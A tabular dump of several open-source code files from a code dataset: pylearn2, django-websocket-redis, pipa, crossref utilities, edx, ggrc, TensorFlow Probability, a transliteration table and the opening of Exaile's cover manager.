| repo_name (string, length 6–100) | path (string, length 4–294) | copies (string, length 1–5) | size (string, length 4–6) | content (string, length 606–896k) | license (string, 15 classes) |
|---|---|---|---|---|---|
woozzu/pylearn2 | pylearn2/linear/linear_transform.py | 49 | 1917 | """
.. todo::
WRITEME
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
class LinearTransform(object):
    """
    Generic interface for a linear transformation, which derived classes may
    realize as a dense matrix multiply, a convolution, etc.

    Subclasses are expected to also inherit from TheanoLinear's
    LinearTransform. This class deliberately does not inherit from it
    directly: most pylearn2 implementations already derive from a
    TheanoLinear subclass, and inheriting here as well would create two
    inheritance paths to TheanoLinear. It exists purely as a placeholder
    documenting the extra methods a TheanoLinear LinearTransform must grow
    in order to work with pylearn2.
    """

    def get_params(self):
        """Return a list of the parameters that govern the transformation."""
        raise NotImplementedError()

    def get_weights_topo(self):
        """
        Return a batch of filters, formatted topologically.

        This is only meaningful for transformations defined on a topological
        space, such as a convolution operator. If the transformation is
        defined on a VectorSpace, some other class (e.g. a ViewConverter) is
        responsible for mapping vectors into a topological space; this method
        does not have to do that itself.
        """
        raise NotImplementedError()

    def set_batch_size(self, batch_size):
        """
        Change the batch size for transformers that fix one (such as Conv2D).

        Parameters
        ----------
        batch_size : int
            The size of the batch
        """
        pass
| bsd-3-clause |
jrief/django-websocket-redis | ws4redis/wsgi_server.py | 2 | 8452 | # -*- coding: utf-8 -*-
import sys
import logging
import six
from six.moves import http_client
from redis import StrictRedis
import django
if django.VERSION[:2] >= (1, 7):
django.setup()
from django.conf import settings
from django.contrib.auth import get_user
from django.core.handlers.wsgi import WSGIRequest
from django.core.exceptions import PermissionDenied
from django import http
from django.utils.encoding import force_str
from django.utils.functional import SimpleLazyObject
from ws4redis import settings as private_settings
from ws4redis.redis_store import RedisMessage
from ws4redis.exceptions import WebSocketError, HandshakeError, UpgradeRequiredError
logger = logging.getLogger('django.request')
try:
# django >= 1.8 && python >= 2.7
# https://docs.djangoproject.com/en/1.8/releases/1.7/#django-utils-dictconfig-django-utils-importlib
from importlib import import_module
except ImportError:
# RemovedInDjango19Warning: django.utils.importlib will be removed in Django 1.9.
from django.utils.importlib import import_module
try:
# django >= 1.7
from django.utils.module_loading import import_string
except ImportError:
# django >= 1.5
from django.utils.module_loading import import_by_path as import_string
class WebsocketWSGIServer(object):
    """
    WSGI application that upgrades an incoming HTTP connection to a
    websocket and then relays messages between that websocket and the
    configured Redis pub/sub channels.
    """

    def __init__(self, redis_connection=None):
        """
        redis_connection can be overriden by a mock object.
        """
        # WS4REDIS_SUBSCRIBER is a dotted path; resolve it to the class.
        comps = str(private_settings.WS4REDIS_SUBSCRIBER).split('.')
        module = import_module('.'.join(comps[:-1]))
        Subscriber = getattr(module, comps[-1])
        # Channels a client may subscribe to or publish on.
        self.possible_channels = Subscriber.subscription_channels + Subscriber.publish_channels
        # Use the injected (possibly mock) connection, else a real Redis one.
        self._redis_connection = redis_connection and redis_connection or StrictRedis(**private_settings.WS4REDIS_CONNECTION)
        self.Subscriber = Subscriber
        self._websockets = set()  # a list of currently active websockets

    def assure_protocol_requirements(self, environ):
        # Reject anything that is not a proper HTTP/1.1 GET websocket upgrade.
        if environ.get('REQUEST_METHOD') != 'GET':
            raise HandshakeError('HTTP method must be a GET')
        if environ.get('SERVER_PROTOCOL') != 'HTTP/1.1':
            raise HandshakeError('HTTP server protocol must be 1.1')
        if environ.get('HTTP_UPGRADE', '').lower() != 'websocket':
            raise HandshakeError('Client does not wish to upgrade to a websocket')

    def process_request(self, request):
        # Default request processing: restore the Django session from the
        # session cookie and attach the authenticated user lazily.
        request.session = None
        request.user = None
        session_key = request.COOKIES.get(settings.SESSION_COOKIE_NAME, None)
        if session_key is not None:
            engine = import_module(settings.SESSION_ENGINE)
            request.session = engine.SessionStore(session_key)
            request.user = SimpleLazyObject(lambda: get_user(request))

    def process_subscriptions(self, request):
        # Query parameters select the channels; a bare 'echo' parameter asks
        # the server to send the client's own messages back to it as well.
        agreed_channels = []
        echo_message = False
        for qp in request.GET:
            param = qp.strip().lower()
            if param in self.possible_channels:
                agreed_channels.append(param)
            elif param == 'echo':
                echo_message = True
        return agreed_channels, echo_message

    @property
    def websockets(self):
        # Set of currently active websocket connections.
        return self._websockets

    def __call__(self, environ, start_response):
        """
        Hijack the main loop from the original thread and listen on events on the Redis
        and the Websocket filedescriptors.
        """
        websocket = None
        subscriber = self.Subscriber(self._redis_connection)
        try:
            self.assure_protocol_requirements(environ)
            request = WSGIRequest(environ)
            # WS4REDIS_PROCESS_REQUEST may be a dotted path, a callable, or
            # unset (in which case the default process_request applies).
            if isinstance(private_settings.WS4REDIS_PROCESS_REQUEST, six.string_types):
                import_string(private_settings.WS4REDIS_PROCESS_REQUEST)(request)
            elif callable(private_settings.WS4REDIS_PROCESS_REQUEST):
                private_settings.WS4REDIS_PROCESS_REQUEST(request)
            else:
                self.process_request(request)
            channels, echo_message = self.process_subscriptions(request)
            # WS4REDIS_ALLOWED_CHANNELS may further filter the channel list;
            # it can be a callable or a dotted path to one.
            if callable(private_settings.WS4REDIS_ALLOWED_CHANNELS):
                channels = list(private_settings.WS4REDIS_ALLOWED_CHANNELS(request, channels))
            elif private_settings.WS4REDIS_ALLOWED_CHANNELS is not None:
                try:
                    mod, callback = private_settings.WS4REDIS_ALLOWED_CHANNELS.rsplit('.', 1)
                    callback = getattr(import_module(mod), callback, None)
                    if callable(callback):
                        channels = list(callback(request, channels))
                except AttributeError:
                    # Not a usable dotted path; keep the unfiltered channels.
                    pass
            websocket = self.upgrade_websocket(environ, start_response)
            self._websockets.add(websocket)
            logger.debug('Subscribed to channels: {0}'.format(', '.join(channels)))
            subscriber.set_pubsub_channels(request, channels)
            # Wait on both the websocket and (when available) the Redis socket.
            websocket_fd = websocket.get_file_descriptor()
            listening_fds = [websocket_fd]
            redis_fd = subscriber.get_file_descriptor()
            if redis_fd:
                listening_fds.append(redis_fd)
            subscriber.send_persisted_messages(websocket)
            recvmsg = None
            while websocket and not websocket.closed:
                # 4-second select timeout bounds the heartbeat interval below.
                ready = self.select(listening_fds, [], [], 4.0)[0]
                if not ready:
                    # flush empty socket
                    websocket.flush()
                for fd in ready:
                    if fd == websocket_fd:
                        # Message from the client: publish it to Redis.
                        recvmsg = RedisMessage(websocket.receive())
                        if recvmsg:
                            subscriber.publish_message(recvmsg)
                    elif fd == redis_fd:
                        # Message from Redis: forward it to the client, but
                        # suppress an echo of its own last message unless the
                        # client asked for echoes.
                        sendmsg = RedisMessage(subscriber.parse_response())
                        if sendmsg and (echo_message or sendmsg != recvmsg):
                            websocket.send(sendmsg)
                    else:
                        logger.error('Invalid file descriptor: {0}'.format(fd))
                # Check again that the websocket is closed before sending the heartbeat,
                # because the websocket can closed previously in the loop.
                if private_settings.WS4REDIS_HEARTBEAT and not websocket.closed:
                    websocket.send(private_settings.WS4REDIS_HEARTBEAT)
            # Remove websocket from _websockets if closed
            if websocket.closed:
                self._websockets.remove(websocket)
        except WebSocketError as excpt:
            logger.warning('WebSocketError: {}'.format(excpt), exc_info=sys.exc_info())
            response = http.HttpResponse(content='Websocket Closed')
            # bypass status code validation in HttpResponse constructor -- necessary for Django v1.11
            response.status_code = 1001
        except UpgradeRequiredError as excpt:
            logger.info('Websocket upgrade required')
            response = http.HttpResponseBadRequest(status=426, content=excpt)
        except HandshakeError as excpt:
            logger.warning('HandshakeError: {}'.format(excpt), exc_info=sys.exc_info())
            response = http.HttpResponseBadRequest(content=excpt)
        except PermissionDenied as excpt:
            logger.warning('PermissionDenied: {}'.format(excpt), exc_info=sys.exc_info())
            response = http.HttpResponseForbidden(content=excpt)
        except Exception as excpt:
            logger.error('Other Exception: {}'.format(excpt), exc_info=sys.exc_info())
            response = http.HttpResponseServerError(content=excpt)
        else:
            # Normal termination of the websocket loop.
            response = http.HttpResponse()
        finally:
            subscriber.release()
            if websocket:
                websocket.close(code=1001, message='Websocket Closed')
            else:
                # No websocket was established, so the WSGI response has not
                # been started yet; do it now for the plain-HTTP error path.
                logger.warning('Starting late response on websocket')
                status_text = http_client.responses.get(response.status_code, 'UNKNOWN STATUS CODE')
                status = '{0} {1}'.format(response.status_code, status_text)
                headers = response._headers.values()
                if six.PY3:
                    headers = list(headers)
                start_response(force_str(status), headers)
                logger.info('Finish non-websocket response with status code: {}'.format(response.status_code))
        return response
| mit |
Ivoz/pipa | pipa/util.py | 1 | 4565 | import os
import random
import string
from configparser import ConfigParser
from hashlib import sha256
import cherrypy
from cherrypy import Tool
from cherrypy._cpcompat import ntob
from cherrypy._cpreqbody import Part
from cherrypy.lib import httputil
# Built-in fallback configuration in INI syntax.  get_config() loads these
# values first, so a user-supplied config file only needs to override the
# settings it wants to change.  The [users] section is filled in by user_mod().
defaults = """
[pipa]
host = localhost
port = 5351
key = server.key
cert = bundle.pem
salt = fj48fn4kvi548gj56j20f934nvo490dsj3nv
packages = packages
[users]
"""
def user_mod(**args):
    """List, add or delete users in the [users] section of the config file.

    Expects the keyword arguments 'conf_file', 'list', 'add' and 'delete'
    as produced by the command-line argument parser.
    """
    conf = get_config(args['conf_file'])
    if not conf.has_section('users'):
        conf.add_section('users')
    if args['list']:
        # Print every known user name, one per line.
        for name in conf.options('users'):
            print(name)
    elif args['add']:
        name, plain = args['add'][0], args['add'][1]
        # Store only the salted digest, never the plain-text password.
        conf.set('users', name, digest(plain, conf['pipa']))
        with open(args['conf_file'], 'w') as handle:
            conf.write(handle)
    elif args['delete']:
        name = args['delete'][0]
        if not conf.has_option('users', name):
            print('user "%s" not found in %s' % (name, args['conf_file']))
        else:
            conf.remove_option('users', name)
            with open(args['conf_file'], 'w') as handle:
                conf.write(handle)
def do_init(salt=None, packages=None, conf_file=None, no_certs=False):
    """Create an initial configuration file and, optionally, SSL certs.

    A random 32-character alphanumeric salt is generated when none is given,
    and the packages directory is created if it does not yet exist.
    """
    print('Generating config...')
    if salt is None:
        letters = string.ascii_letters + string.digits
        salt = ''.join(random.choice(letters) for i in range(32))
    packages = packages or 'packages'
    if not os.path.isdir(packages):
        os.makedirs(packages)
    config = get_config()
    config['pipa']['salt'] = salt
    config['pipa']['packages'] = packages
    with open(conf_file, 'w') as c:
        config.write(c)
    print('Config written!')
    if not no_certs:
        # Deferred import: certificate generation is optional and pulls in
        # extra dependencies.
        from .certs import gen_certs
        gen_certs()
def get_config(conf_file=None):
    """Build a ConfigParser pre-loaded with the built-in defaults.

    When *conf_file* is given, settings read from that file override the
    defaults.
    """
    parser = ConfigParser()
    parser.read_string(defaults)
    if conf_file is not None:
        parser.read(conf_file)
    return parser
def digest(password, conf=None):
    """Return the salted, iterated SHA-256 hex digest of *password*.

    *conf* must be a mapping providing a 'salt' entry; when omitted, the
    running cherrypy application's pipa config section is used.
    """
    if conf is None:
        conf = cherrypy.request.app.root.pipa
    pwd_bytes = ntob(password)
    salt_bytes = ntob(conf['salt'])
    # Start from a fixed seed digest, then stretch with 5000 hashing rounds.
    state = sha256(b'36' * 16).digest()
    for _ in range(5000):
        state = sha256(state + salt_bytes + pwd_bytes + state).digest()
    return sha256(state + salt_bytes + pwd_bytes + state).hexdigest()
class DistUtilsPart(Part):
    """A multipart Part whose header parser tolerates the bare-LF line
    terminators sent by distutils upload clients (strict MIME wants CRLF).
    """

    # Modernized from the Python-2.1-era ``read_headers = classmethod(...)``
    # rebinding idiom to the equivalent decorator form.
    @classmethod
    def read_headers(cls, fp):
        """Read MIME headers from *fp* and return them as a HeaderMap.

        Raises EOFError if the stream ends before the header block does.
        """
        headers = httputil.HeaderMap()
        while True:
            line = fp.readline()
            if not line:
                # No more data--illegal end of headers
                raise EOFError("Illegal end of headers.")
            if line == ntob('\n'):
                # Normal end of headers
                break
            # Deliberately NOT enforcing CRLF terminators, unlike the stock
            # cherrypy Part.read_headers:
            # if not line.endswith(ntob('\r\n')):
            #     raise ValueError("MIME requires CRLF terminators: %r" % line)
            if line[0] in ntob(' \t'):
                # It's a continuation line: extend the previous header's value.
                v = line.strip().decode('ISO-8859-1')
            else:
                k, v = line.split(ntob(":"), 1)
                k = k.strip().decode('ISO-8859-1')
                v = v.strip().decode('ISO-8859-1')
            existing = headers.get(k)
            if existing:
                # Repeated headers are folded into one comma-separated value.
                v = ", ".join((existing, v))
            headers[k] = v
        return headers
def distutils_form(force=True, debug=False):
    """Tool callback that swaps cherrypy's multipart processor for one based
    on DistUtilsPart, so uploads from distutils clients parse correctly."""
    request = cherrypy.serving.request

    def process(entity):
        # Parse the multipart body using the lenient DistUtilsPart class.
        entity.part_class = DistUtilsPart
        cherrypy._cpreqbody.process_multipart(entity)
        kept_parts = []
        for part in entity.parts:
            if part.name is None:
                # Nameless parts are kept on the entity for later inspection.
                kept_parts.append(part)
            else:
                if part.filename is None:
                    # It's a regular field
                    value = part.fullvalue()
                else:
                    # It's a file upload. Retain the whole part so consumer
                    # code has access to its .file and .filename attributes.
                    value = part
                if part.name in entity.params:
                    # Repeated field names accumulate their values in a list.
                    if not isinstance(entity.params[part.name], list):
                        entity.params[part.name] = [entity.params[part.name]]
                    entity.params[part.name].append(value)
                else:
                    entity.params[part.name] = value
        entity.parts = kept_parts

    request.body.processors['multipart/form-data'] = process


# Hooked in before the request body is read, so the custom processor above is
# registered in time to handle multipart uploads.
DistutilsUpload = Tool('before_request_body', distutils_form)
| mit |
ScholarTools/crossref_api_python | crossref/utils.py | 1 | 3636 | # -*- coding: utf-8 -*-
"""
#TODO: break out display utils to another module
"""
def display_class(class_instance, pv, method_pv=None):
    """Render a class-instance header followed by its property listing."""
    # TODO: Handle methods
    header = '%s:\n' % type(class_instance)
    return header + property_values_to_string(pv, extra_indentation=4)
def float_or_none_to_string(x):
    """Format *x* with two decimal places, or return 'None' when x is None."""
    return 'None' if x is None else '%0.2f' % x
def property_values_to_string(pv, extra_indentation=0):
    """Format alternating property names and values as aligned lines.

    Parameters
    ----------
    pv : list
        Flat list alternating property names and values, i.e.
        [name1, value1, name2, value2, ...] — names occupy the even indices.
        (The previous docstring claimed an OrderedDict; the slicing below
        has always required a flat sequence.)
    extra_indentation : int
        Number of extra leading spaces added to every line.

    Returns
    -------
    str
        One "name: value" line per pair, with names right-aligned; the
        empty string when *pv* is empty.
    """
    keys = pv[::2]
    values = pv[1::2]
    if not keys:
        # Avoid max() on an empty sequence when there are no properties.
        return u''
    key_lengths = [len(x) for x in keys]
    max_key_length = max(key_lengths) + extra_indentation
    space_padding = [max_key_length - x for x in key_lengths]
    key_display_strings = [' ' * x + y for x, y in zip(space_padding, keys)]
    lines = [u'%s: %s\n' % (key, value)
             for key, value in zip(key_display_strings, values)]
    return u''.join(lines)
def get_list_class_display(value):
    """Summarize *value* for display.

    - None          -> 'None'
    - empty list    -> '[??] len(0)'
    - list          -> '[ElementClass] len(n)', based on the first element
    - anything else -> '<ClassName>'
    """
    if value is None:
        return 'None'
    elif isinstance(value, list):
        if len(value) == 0:
            return u'[??] len(0)'
        # Assume a homogeneous list and report the first element's class.
        # (This used to wrap the lookup in a bare except that dropped into
        # pdb.set_trace() — a debugger breakpoint left in production code.)
        return u'[%s] len(%d)' % (value[0].__class__.__name__, len(value))
    else:
        return u'<%s>' % (value.__class__.__name__)
def get_truncated_display_string(input_string, max_length=50):
    """Return *input_string* shortened to *max_length* chars plus '...'.

    None passes through unchanged; lists and dicts are first converted to
    their string representation.
    """
    # TODO: We should really check for non-string and convert
    if input_string is None:
        return None
    if isinstance(input_string, (list, dict)):
        input_string = '%s' % input_string
    if len(input_string) <= max_length:
        return input_string
    return input_string[:max_length] + '...'
def user_name_to_file_name(user_name):
    """Derive a file-name identifier from a user name (an email address).

    Provides a standard mapping that should be unique per user; no file
    extension is added.

    See Also
    --------
    utils.get_save_root
    """
    # Good enough for now: drop periods, keep every other character.
    return user_name.replace('.', '')
def get_unnasigned_json(json_data, populated_object):
    """Return the entries of *json_data* that were never copied onto
    *populated_object*.

    Matching is by name: a key is considered "used" when the object has an
    instance attribute of the same name.
    """
    if not json_data:
        return {}
    assigned = populated_object.__dict__.keys()
    return {key: json_data[key] for key in set(json_data) if key not in assigned}
def assign_json(json_data, field_name, optional=True, default=None):
    """Fetch *field_name* from a JSON dict, honoring optional fields.

    Returns the value when present.  For a missing field, returns *default*
    when *optional* is true.

    Raises
    ------
    KeyError
        If the field is missing and *optional* is False.  (This replaces the
        old placeholder ``Exception("TODO: Fix me")``; KeyError is a subclass
        of Exception, so existing broad handlers still match.)
    """
    if field_name in json_data:
        return json_data[field_name]
    if optional:
        return default
    raise KeyError('Required field %r missing from JSON data' % field_name)
def clean_dict_keys(d):
    """Return a copy of *d* with hyphens in its keys turned into underscores."""
    return {key.replace('-', '_'): value for key, value in d.items()}
deepsrijit1105/edx-platform | cms/lib/xblock/tagging/migrations/0001_initial.py | 39 | 1187 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for the structured tagging app: tag categories and the
    set of values available within each category."""

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='TagAvailableValues',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('value', models.CharField(max_length=255)),
            ],
            options={
                'ordering': ('id',),
            },
        ),
        migrations.CreateModel(
            name='TagCategories',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=255, unique=True)),
                ('title', models.CharField(max_length=255)),
            ],
            options={
                'ordering': ('title',),
            },
        ),
        # Added last, after both models exist, so the FK target is in place.
        migrations.AddField(
            model_name='tagavailablevalues',
            name='category',
            field=models.ForeignKey(to='tagging.TagCategories'),
        ),
    ]
| agpl-3.0 |
kr41/ggrc-core | src/ggrc_workflows/models/cycle_task_entry.py | 7 | 1350 | # Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module containing the workflow CycleTaskEntry model."""
from sqlalchemy.ext.hybrid import hybrid_property
from ggrc import db
from ggrc.models.mixins import Base, Described
from ggrc.models.object_document import Documentable
class CycleTaskEntry(Described, Documentable, Base, db.Model):
    """Workflow CycleTaskEntry model."""

    __tablename__ = 'cycle_task_entries'

    # Backing column for the is_declining_review hybrid property below.
    _is_declining_review = db.Column(db.Boolean, nullable=True)
    # Owning cycle; entries are deleted along with their cycle.
    cycle_id = db.Column(
        db.Integer,
        db.ForeignKey('cycles.id', ondelete="CASCADE"),
        nullable=False,
    )
    cycle_task_group_object_task_id = db.Column(
        db.Integer,
        db.ForeignKey('cycle_task_group_object_tasks.id', ondelete="CASCADE"),
        nullable=False,
    )
    cycle_task_group_object_task = db.relationship(
        'CycleTaskGroupObjectTask',
        foreign_keys='CycleTaskEntry.cycle_task_group_object_task_id',
        backref='cycle_task_entries',
    )
    # Attributes exposed through the JSON publishing machinery.
    _publish_attrs = [
        'cycle',
        'cycle_task_group_object_task',
        'is_declining_review'
    ]

    @hybrid_property
    def is_declining_review(self):
        # Expose the private flag under its public name.
        return self._is_declining_review

    @is_declining_review.setter
    def is_declining_review(self, value):
        # Coerce any truthy/falsy input to a strict boolean before storing.
        self._is_declining_review = bool(value)
| apache-2.0 |
tensorflow/probability | tensorflow_probability/python/optimizer/convergence_criteria/convergence_criterion.py | 1 | 6013 | # Copyright 2019 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Base class for convergence criteria."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
class ConvergenceCriterion(object):
  """Base class for stopping rules.

  A convergence criterion determines when an optimization has converged given
  its history of losses, gradients, and parameter values. Each criterion is
  responsible for propagating from step to step whatever state it needs to
  represent the relevant aspects of that history (for example, a moving average
  of previous loss values or gradients). In particular, subclasses must
  implement:

  - `_bootstrap(loss, grads, parameters)`: takes the
    initial loss, gradients, and values of parameters, and returns a (structure
    of) `Tensor`(s) representing the initial values of any auxiliary quantities
    tracked by the convergence criterion.
  - `_one_step(step, loss, grads, window_size, auxiliary_state)`: At
    integer `step >= 1`,
    takes the current loss, gradients, and values of parameters, along with
    any auxiliary state carried over from the previous step, and returns
    `(has_converged, updated_auxiliary_state)`, where `has_converged` is a
    boolean `Tensor`, and `updated_auxiliary_state` is a (structure of)
    Tensor(s) matching `auxiliary_state`, containing whatever information must
    be propagated to the next timestep.
  """

  def __init__(self, min_num_steps=None, name=None):
    """Constructs the `ConvergenceCriterion`.

    This is a private method for subclass use.

    Args:
      min_num_steps: optional int `Tensor` minimum number of steps before
        stopping. If set, subclass return values of `has_converged=True` will be
        ignored until `step >= min_num_steps`.
        Default value: `None`.
      name: optional Python `str` name prefixed to ops created by this class.
    """
    # Guard the conversion: `tf.convert_to_tensor(None)` raises, which made
    # the documented default of `min_num_steps=None` unusable and also turned
    # the `is not None` check in `one_step` into dead code.
    self._min_num_steps = (
        None if min_num_steps is None
        else tf.convert_to_tensor(min_num_steps, dtype=tf.int32))
    self._name = name

  @property
  def min_num_steps(self):
    # int32 `Tensor` lower bound on the stopping step, or `None` if unset.
    return self._min_num_steps

  @property
  def name(self):
    return self._name

  def bootstrap(self, loss, grads, parameters):
    """Returns a structure of `Tensors` for the rule's state at step 0.

    The shape of the `Tensor`s specifying `loss`, `grads`, and `parameters` may
    optionally be prefixed by one or more batch dimension(s).

    Args:
      loss: float `Tensor` initial value of loss being optimized.
      grads: list of float `Tensor` gradients of `loss` wrt `parameters`.
      parameters: list of float `Tensor` initial values of parameters
        being optimized.
    Returns:
      initial_auxiliary_state: (Structure of) `Tensor`(s) representing the
        initial auxiliary state carried forward by this criterion.
    """
    with tf.name_scope(self.name):
      return self._bootstrap(
          loss=tf.convert_to_tensor(loss),
          # `grads` may be None for gradient-free criteria; only convert when
          # gradients were actually supplied.
          grads=(tf.nest.map_structure(tf.convert_to_tensor, grads)
                 if grads is not None else grads),
          parameters=tf.nest.map_structure(tf.convert_to_tensor, parameters))

  def one_step(self, step, loss, grads, parameters, auxiliary_state):
    """Updates tracked quantities for a new step, and determines if converged.

    The shape of the `Tensor`s specifying `loss`, `grads`, and `parameters` may
    optionally be prefixed by one or more batch dimension(s). In this case,
    the returned value `has_converged` will have shape equal to the broadcast
    batch shape of whichever of those quantities is used by this convergence
    criterion, and the quantities defining the convergence criterion (
    `min_num_steps`, etc.).

    Args:
      step: integer `Tensor` index of the current step, where `step >= 1` (on
        step `0`, `initial_state` should be called instead).
      loss: float `Tensor` value of loss at the current step.
      grads: list of float `Tensor` gradients of `loss` wrt `parameters`.
      parameters: list of float `Tensor` current values of parameters
        being optimized.
      auxiliary_state: the (structure of) `Tensor`(s) containing state carried
        forward from the previous step.
    Returns:
      has_converged: boolean `Tensor` indicating whether the optimization has
        converged.
      updated_auxiliary_state: (Structure of) `Tensor`(s) representing
        updated quantities tracked by the convergence criterion. This should
        match the structure of the value returned by `bootstrap`.
    """
    with tf.name_scope(self.name):
      has_converged, updated_auxiliary_state = self._one_step(
          step=tf.convert_to_tensor(step),
          loss=tf.convert_to_tensor(loss),
          grads=(tf.nest.map_structure(tf.convert_to_tensor, grads)
                 if grads is not None else grads),
          parameters=tf.nest.map_structure(tf.convert_to_tensor, parameters),
          auxiliary_state=auxiliary_state)
      if self.min_num_steps is not None:
        # Suppress early convergence until the minimum step count is reached.
        has_converged = has_converged & (step >= self.min_num_steps)
      return has_converged, updated_auxiliary_state

  def _bootstrap(self, loss, grads, parameters):
    raise NotImplementedError('`_bootstrap` not implemented.')

  def _one_step(self, step, loss, grads, parameters, auxiliary_state):
    raise NotImplementedError('`_one_step` not implemented.')
| apache-2.0 |
# Transliteration table for the Unicode block U+FE00..U+FEFF (variation
# selectors, vertical/compatibility forms, small form variants).  Index i
# holds the ASCII replacement for code point U+FE00+i; '[?]' marks code
# points with no ASCII equivalent, '' marks ignorable ones.  Expressed as
# run-length concatenation instead of 256 literal lines.
data = (
    ('[?]',) * 0x20                                       # 0x00-0x1f
    + ('', '', '', '~')                                   # 0x20-0x23
    + ('[?]',) * 12                                       # 0x24-0x2f
    + ('..', '--', '-', '_', '_',                         # 0x30-0x34
       '(', ') ', '{', '} ', '[', '] ', '[(', ')] ',      # 0x35-0x3c
       '<<', '>> ', '<', '> ', '[', '] ', '{', '}')       # 0x3d-0x44
    + ('[?]',) * 4                                        # 0x45-0x48
    + ('',) * 7                                           # 0x49-0x4f
    + (',', ',', '.', '', ';', ':', '?', '!', '-',        # 0x50-0x58
       '(', ')', '{', '}', '{', '}', '#', '&', '*',       # 0x59-0x61
       '+', '-', '<', '>', '=', '', '\\', '$', '%', '@')  # 0x62-0x6b
    + ('[?]',) * 4                                        # 0x6c-0x6f
    + ('', '', '', '[?]', '', '[?]')                      # 0x70-0x75
    + ('',) * 135                                         # 0x76-0xfc
    + ('[?]', '[?]', '')                                  # 0xfd-0xff
)
| gpl-3.0 |
sjohannes/exaile | xlgui/cover.py | 2 | 39885 | # Copyright (C) 2008-2010 Adam Olsen
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#
# The developers of the Exaile media player hereby grant permission
# for non-GPL compatible GStreamer and Exaile plugins to be used and
# distributed together with GStreamer and Exaile. This permission is
# above and beyond the permissions granted by the GPL license by which
# Exaile is covered. If you modify this code, you may extend this
# exception to your version of the code, but you are not obligated to
# do so. If you do not wish to do so, delete this exception statement
# from your version.
import logging
import os
import os.path
import tempfile
import threading
import cairo
from gi.repository import Gio
from gi.repository import Gdk
from gi.repository import GdkPixbuf
from gi.repository import GLib
from gi.repository import GObject
from gi.repository import Gtk
from xl import common, event, providers, settings, xdg
from xl.covers import MANAGER as COVER_MANAGER
from xl.nls import gettext as _
from xlgui.widgets import dialogs, menu
from xlgui import guiutil
from xlgui.guiutil import pixbuf_from_data
logger = logging.getLogger(__name__)
def save_pixbuf(pixbuf, path, type_):
    """Save a pixbuf to a local file.

    Thin wrapper hiding the awkward GdkPixbuf.savev calling convention; it
    can be dropped if PyGObject ever ships a friendlier override.

    :param pixbuf: Pixbuf to save
    :type pixbuf: GdkPixbuf.Pixbuf
    :param path: Path of file to save to
    :type path: str
    :param type_: Type of image file. See GdkPixbuf.savev for valid values.
    :type type_: str
    :return: None
    """
    pixbuf.savev(path, type_, [None], [])
class CoverManager(GObject.GObject):
"""
Cover manager window
"""
__gsignals__ = {
'prefetch-started': (GObject.SignalFlags.RUN_LAST, None, ()),
'prefetch-progress': (GObject.SignalFlags.RUN_LAST, None, (GObject.TYPE_INT,)),
'prefetch-completed': (GObject.SignalFlags.RUN_LAST, None, (GObject.TYPE_INT,)),
'fetch-started': (GObject.SignalFlags.RUN_LAST, None, (GObject.TYPE_INT,)),
'fetch-completed': (GObject.SignalFlags.RUN_LAST, None, (GObject.TYPE_INT,)),
'fetch-progress': (GObject.SignalFlags.RUN_LAST, None, (GObject.TYPE_INT,)),
'cover-fetched': (
GObject.SignalFlags.RUN_LAST,
None,
(GObject.TYPE_PYOBJECT, GdkPixbuf.Pixbuf),
),
}
def __init__(self, parent, collection):
"""
Initializes the window
"""
GObject.GObject.__init__(self)
# List of identifiers of albums without covers
self.outstanding = []
# Map of album identifiers and their tracks
self.album_tracks = {}
self.outstanding_text = _('{outstanding} covers left to fetch')
self.completed_text = _('All covers fetched')
self.cover_size = (90, 90)
self.default_cover_pixbuf = pixbuf_from_data(
COVER_MANAGER.get_default_cover(), self.cover_size
)
builder = Gtk.Builder()
builder.add_from_file(xdg.get_data_path('ui', 'covermanager.ui'))
builder.connect_signals(self)
self.window = builder.get_object('window')
self.window.set_transient_for(parent)
self.message = dialogs.MessageBar(
parent=builder.get_object('content_area'), buttons=Gtk.ButtonsType.CLOSE
)
self.previews_box = builder.get_object('previews_box')
self.model = builder.get_object('covers_model')
# Map of album identifiers and model paths
self.model_path_cache = {}
self.menu = CoverMenu(self)
self.menu.attach_to_widget(self.previews_box, lambda menu, widget: True)
self.progress_bar = builder.get_object('progressbar')
self.progress_bar.set_text(_('Collecting albums and covers...'))
self.progress_bar.pulse_timeout = GLib.timeout_add(
100, self.on_progress_pulse_timeout
)
self.close_button = builder.get_object('close_button')
self.stop_button = builder.get_object('stop_button')
self.stop_button.set_sensitive(False)
self.fetch_button = builder.get_object('fetch_button')
self.window.show_all()
self.stopper = threading.Event()
thread = threading.Thread(
target=self.prefetch, name='CoverPrefetch', args=(collection,)
)
thread.daemon = True
thread.start()
def prefetch(self, collection):
"""
Collects all albums and sets the list of outstanding items
"""
albums = set()
for track in collection:
if self.stopper.is_set():
return
try:
artist = track.get_tag_raw('artist')[0]
album = track.get_tag_raw('album')[0]
except TypeError:
continue
if not album or not artist:
continue
album = (artist, album)
try:
self.album_tracks[album].append(track)
except KeyError:
self.album_tracks[album] = [track]
albums.add(album)
